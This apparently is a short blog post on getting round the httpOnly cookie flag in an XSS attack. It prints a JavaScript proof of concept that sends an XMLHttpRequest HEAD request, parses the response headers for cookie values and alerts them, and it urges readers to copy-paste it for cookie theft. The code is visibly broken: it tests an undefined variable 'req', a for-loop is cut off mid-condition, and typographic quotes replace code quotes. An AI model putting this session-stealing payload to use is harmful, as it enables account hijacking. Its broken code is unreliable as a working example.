I remember well a couple of days ago when I have read on ha.ckers.org this subject and in the first moments I though it will be secure, but after the first three lines realized that the only difference it made was the length of the XSS code
For those who have a trouble in finding the equivalent of document.cookie in ajax here is the PoC (answer):
var doc;
try { doc = new XMLHttpRequest(); } catch(e) {}
if (!req) try { doc = new ActiveXObject(”Msxml2.XMLHTTP”); } catch(e) {}
if (!req) try { doc = new ActiveXObject(”Microsoft.XMLHTTP”); } catch(e) {}doc.open(”HEAD”, document.location, true);
doc.send(null);doc.onreadystatechange=function() {
if(doc.readyState==4) {
if(doc.status==200) {
var hidden=””;
var headers=doc.getAllResponseHeaders().split(” “);
for(i=0;i
var off1 = headers[i].indexOf(” “)+1;
var off2 = headers[i].indexOf(”;”)+1;
var cookie=headers[i].substring(off1, off2);
hidden=hidden+cookie+” “;
}
}
alert(”httpOnly cookie: “+hidden);
}
}
Copy-paste the above snippet of code because in the “years” that are going to come maybe it will be the only way to get cookies.
0 Responses to “httpOnly vs. XmlHttpRequest”